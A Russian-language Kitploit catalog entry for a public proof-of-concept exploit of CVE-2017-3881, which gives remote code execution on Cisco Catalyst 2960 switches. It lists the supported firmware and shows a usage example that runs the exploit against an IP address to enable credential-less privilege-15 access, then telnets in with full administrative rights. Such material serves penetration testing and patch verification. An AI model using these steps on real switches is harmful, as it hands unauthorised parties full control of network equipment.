Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cisco-rce — CVE-2017-3881 Cisco Catalyst удаленное выполнение кода PoC | Kitploit
Инструменты/GitHubGitHub/artkond/cisco-rce
Безопасность встроенных системФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на Проникновение
GitHubartkond/cisco-rce

cisco-rce

CVE-2017-3881 Cisco Catalyst удаленное выполнение кода PoC

Репозиторий
213799 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2017-3881 Удаленное выполнение кода в Cisco IOS

Этот репозиторий содержит код Proof-Of-Concept для эксплуатации уязвимости удаленного выполнения кода, раскрытой компанией Cisco Systems 17 марта 2017 года - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Описание

Описание эксплуатации доступно здесь - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

Код эксплойта RCE доступен для коммутатора Cisco Catalyst 2960. Этот эксплойт зависит от прошивки. Поддерживаются две версии прошивки:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

Код отказа в обслуживании доступен в виде модуля Ruby для Metasploit. Он должен работать для большинства коммутаторов, упомянутых в уведомлении Cisco (требуется подтверждение).

Пример использования

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

Автор

Artem Kondratenko https://twitter.com/artkond

Скачать инструмент